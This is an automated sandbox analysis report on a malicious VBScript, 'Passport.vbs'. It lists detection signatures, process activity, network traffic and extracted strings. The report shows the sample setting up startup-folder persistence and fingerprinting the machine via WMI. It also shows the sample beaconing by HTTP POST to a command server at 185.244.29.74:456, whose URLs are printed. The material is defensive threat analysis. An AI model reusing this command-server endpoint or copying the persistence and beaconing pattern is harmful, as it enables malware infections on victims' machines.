Edit tour

Windows Analysis Report
Passport.vbs

Overview

General Information

Sample name:	Passport.vbs
Analysis ID:	1523251
MD5:	a6e8ec20954128687a0534917c8f9ddd
SHA1:	c0bac2548af02d37b18b16bddb39ccd9ea5f0cc2
SHA256:	aca5887474e22b7be6121c56919953745a7a821311080acbe8970da7ed9479b8
Tags:	vbsuser-ankit_anubhav
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

System process connects to network (likely due to code injection or exploit)

VBScript performs obfuscated calls to suspicious functions

AI detected suspicious sample

Potential context-aware VBS script found (checks for environment specific values)

Potential malicious VBS script found (has network functionality)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Sigma detected: WScript or CScript Dropper - File

Uses known network protocols on non-standard ports

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Windows Shell Script Host drops VBS files

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Found WSH timer for Javascript or VBS script (likely evasive script)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check the online IP address of the machine

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Script Initiated Connection

Sigma detected: Startup Folder File Write

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5276 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 5752 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cleanup

Sigma Signatures

System Summary

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 34.117.59.81, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5276, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" , ProcessId: 5752, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" , ProcessId: 5752, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs", ProcessId: 5276, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper - File

Source: File created

Author: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5276, TargetFilename: C:\Users\user\AppData\Local\Temp\Passport.vbs

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 34.117.59.81, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5276, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5276, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs", ProcessId: 5276, ProcessName: wscript.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.7% probability

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49707 version: TLS 1.2

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 34.117.59.81 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 185.244.29.74 456			Jump to behavior

Potential malicious VBS script found (has network functionality)

Source:	Initial file: xx.setrequestheader "User-Agent",gg
Source: C:\Windows\System32\wscript.exe	Dropped file: xx.setrequestheader "User-Agent",gg			Jump to dropped file

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49730

Source: global traffic

TCP traffic: 192.168.2.5:49706 -> 185.244.29.74:456

Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: Joe Sandbox View	ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: Joe Sandbox View	ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /org HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /org HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74

Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /org HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /org HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ipinfo.io

Source: unknown

HTTP traffic detected: POST /document HTTP/1.1Accept: */*User-Agent: B81A4609Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.244.29.74:456Content-Length: 0Connection: Keep-AliveCache-Control: no-cache

Source: wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74/
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74/d1
Source: wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74/j
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155696546.00000282CCBC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr	String found in binary or memory: http://185.244.29.74:456/document
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/document&
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/document32
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentB
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentG
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentJ
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentT
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentX
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/document_
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentage:
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentgE
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentnE
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentq
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentr
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr	String found in binary or memory: https://ipinfo.io/country
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/country6%
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryS
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryW
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryY:
Source: wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/country_
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryq
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryz%
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4525760224.00000282CADAD000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr	String found in binary or memory: https://ipinfo.io/org
Source: wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/org_
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49707 version: TLS 1.2

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior

Source: Passport.vbs

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal100.troj.evad.winVBS@2/7@1/2

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Passport.vbs

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs"

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
